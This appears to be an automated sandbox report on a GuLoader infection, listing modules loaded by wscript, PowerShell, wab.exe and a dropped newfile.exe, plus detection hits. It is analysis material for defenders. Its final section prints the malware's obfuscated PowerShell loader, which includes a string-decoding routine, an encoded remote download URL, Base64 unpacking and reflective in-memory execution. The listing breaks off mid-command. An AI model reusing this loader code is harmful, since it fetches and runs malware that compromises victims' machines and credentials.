            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: actxprxy.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: qm.Core.pdb7 source: powershell.exe, 0000000D.00000002.1839791361.00000000082CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1836814367.0000000007366000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb_ source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000D.00000002.1839791361.00000000082BA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdbGCTL source: newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe, newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Vale", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000D.00000002.1847193868.000000000ACC4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1846945449.0000000009760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1835301736.00000000059E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Blokerklringernes)$global:Philomythic = [System.Text.Encoding]::ASCII.GetString($Farrieries)$global:Konkurreret=$Philomythic.substring(298105,28500)<#Nonreusable Federating Spytslikk
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Survive $Afkriminaliseringen $Fodermester), (Humrs @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Landsbyens = [AppDomain]::CurrentDomain.GetAssemblies()$
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Greenhead)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Proselyting, $false).DefineType($Friskheden, $N
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Blokerklringernes)$global:Philomythic = [System.Text.Encoding]::ASCII.GetString($Farrieries)$global:Konkurreret=$Philomythic.substring(298105,28500)<#Nonreusable Federating Spytslikk
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. 